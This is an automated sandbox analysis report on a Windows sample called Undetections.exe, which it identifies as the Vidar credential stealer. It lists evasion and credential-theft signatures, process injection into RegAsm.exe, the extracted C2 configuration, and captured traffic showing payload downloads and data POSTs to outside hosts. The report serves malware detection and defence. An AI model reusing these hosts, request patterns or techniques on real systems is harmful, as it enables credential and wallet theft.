Windows Analysis Report
Undetections.exe

Overview

General Information

Sample name: Undetections.exe
Analysis ID: 1423660
MD5: 3af8847a68f187e5425af04cfe48d1cf
SHA1: 51005458a440023c8537db8a72f19094b91837b4
SHA256: d241425f895f1f32b3f619c33d9b95820a25feb7ded489d449f36ac3c96b9865
Tags: exe

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Undetections.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\Undetections.exe" MD5: 3AF8847A68F187E5425AF04CFE48D1CF)
    • spoofer.exe (PID: 7592 cmdline: "C:\Users\user\AppData\Roaming\Undetections\spoofer.exe" MD5: 96EF850D149542B53F033375B1C50CC9)
      • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 7652 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199662282318"], "Botnet": "911b907d575a663515ef24804cc499f0", "Version": "8.8"}

Source | Rule | Description | Author | Strings
Undetections.exe | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000002.1756042307.0000000004175000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000000.1639618593.0000000000478000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

Source | Rule | Description | Author | Strings
2.2.spoofer.exe.4175570.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
4.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
2.2.spoofer.exe.4175570.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
4.2.RegAsm.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.Undetections.exe.5390000.12.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

No Sigma rule has matched
No Snort rule has matched

                          AV Detection

                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeAvira: detection malicious, Label: TR/AD.Nekark.gilay
                          Source: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199662282318"], "Botnet": "911b907d575a663515ef24804cc499f0", "Version": "8.8"}
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeReversingLabs: Detection: 60%
                          Source: Undetections.exeVirustotal: Detection: 30%
                          Source: Undetections.exeReversingLabs: Detection: 26%
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeJoe Sandbox ML: detected
                          Source: Undetections.exeJoe Sandbox ML: detected
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00411600 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,4_2_00411600
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00406EB0 CryptUnprotectData,LocalAlloc,LocalFree,4_2_00406EB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00409110 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcat,PK11_FreeSlot,lstrcat,4_2_00409110
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00406E30 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,4_2_00406E30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D0A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,4_2_69D0A9A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D30180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,4_2_69D30180
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D043B0 PK11_PubEncryptPKCS1,PR_SetError,4_2_69D043B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D525B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,4_2_69D525B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D044C0 PK11_PubEncrypt,4_2_69D044C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D04440 PK11_PrivDecrypt,4_2_69D04440
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CD4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,4_2_69CD4420
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D2A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,4_2_69D2A730
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CEE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,4_2_69CEE6E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D0A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,4_2_69D0A650
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CE8670 PK11_ExportEncryptedPrivKeyInfo,4_2_69CE8670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D03850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,4_2_69D03850
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D09840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,4_2_69D09840
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D2DA40 SEC_PKCS7ContentIsEncrypted,4_2_69D2DA40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CE7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,4_2_69CE7D60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D2BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,4_2_69D2BD30
                          Source: Undetections.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 193.109.246.100:443 -> 192.168.2.4:49732 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 193.109.246.100:443 -> 192.168.2.4:49741 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.102.129.112:443 -> 192.168.2.4:49742 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 95.217.212.139:443 -> 192.168.2.4:49743 version: TLS 1.2
                          Source: Undetections.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000004.00000002.2156275105.000000006F8AD000.00000002.00000001.01000000.00000012.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr
                          Source: Binary string: freebl3.pdb source: freebl3.dll.4.dr, freebl3[1].dll.4.dr
                          Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed#fontawesome.sharpQcostura.fontawesome.sharp.dll.compressed source: Undetections.exe
                          Source: Binary string: freebl3.pdbp source: freebl3.dll.4.dr, freebl3[1].dll.4.dr
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdbBSJB source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr
                          Source: Binary string: C:\projects\fontawesome-sharp\FontAwesome.Sharp\obj\Release\net472\FontAwesome.Sharp.pdb source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4107042182.0000000005BF0000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003A61000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.costura.pdb.compressed source: Undetections.exe
                          Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.4.dr, softokn3.dll.4.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.4.dr, vcruntime140[1].dll.4.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.4.dr, msvcp140.dll.4.dr
                          Source: Binary string: costura.costura.pdb.compressedlBkq source: Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: nss3.pdb source: RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.dr
                          Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000004.00000002.2156275105.000000006F8AD000.00000002.00000001.01000000.00000012.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr
                          Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: Undetections.exe
                          Source: Binary string: softokn3.pdb source: softokn3[1].dll.4.dr, softokn3.dll.4.dr
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdb source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\7xp79cm1d4qf1g\obj\Release\Beyound.pdb source: spoofer.exe.0.dr
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00401120 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,4_2_00401120
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040D200 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040D200
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00416370 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,4_2_00416370
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040A410 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0040A410
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00417420 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,4_2_00417420
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00416BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,4_2_00416BC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040AF10 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0040AF10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00417010 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,4_2_00417010
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040A860 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0040A860
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004167B0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,4_2_004167B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 4x nop then jmp 16DE2BE0h0_2_16DE2A98
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 4x nop then jmp 16DE38D2h0_2_16DE2244
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_16DEA708
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 4x nop then jmp 16DE38D2h0_2_16DE3078
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_16E24FA3
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_16E2BD98
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 4x nop then jmp 16E2F8B2h0_2_16E2F2A0
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 4x nop then inc dword ptr [ebp-10h]0_2_16E2F2A0

                          Networking

                          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199662282318
                          Source: Yara matchFile source: 0.2.Undetections.exe.5390000.12.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Undetections.exe.3ba19f0.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Undetections.exe.3e21a10.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/z-Closing.txt HTTP/1.1Host: universalbeure.usite.proConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/hwid.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/qwxisix/hwids.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/qwxisix/Undetections/BuildLink.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/qwxisix/Undetections/BuildName.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/qwxisix/Undetections/BuildZipName.txt HTTP/1.1Host: universalbeure.usite.pro
                          Source: global trafficHTTP traffic detected: GET /spoofer.zip HTTP/1.1Host: ashjghas.ucoz.netConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199662282318 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 104.102.129.112 104.102.129.112
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKECAFIDAFIECBKEHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 7105Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.217.212.139Cache-Control: no-cache
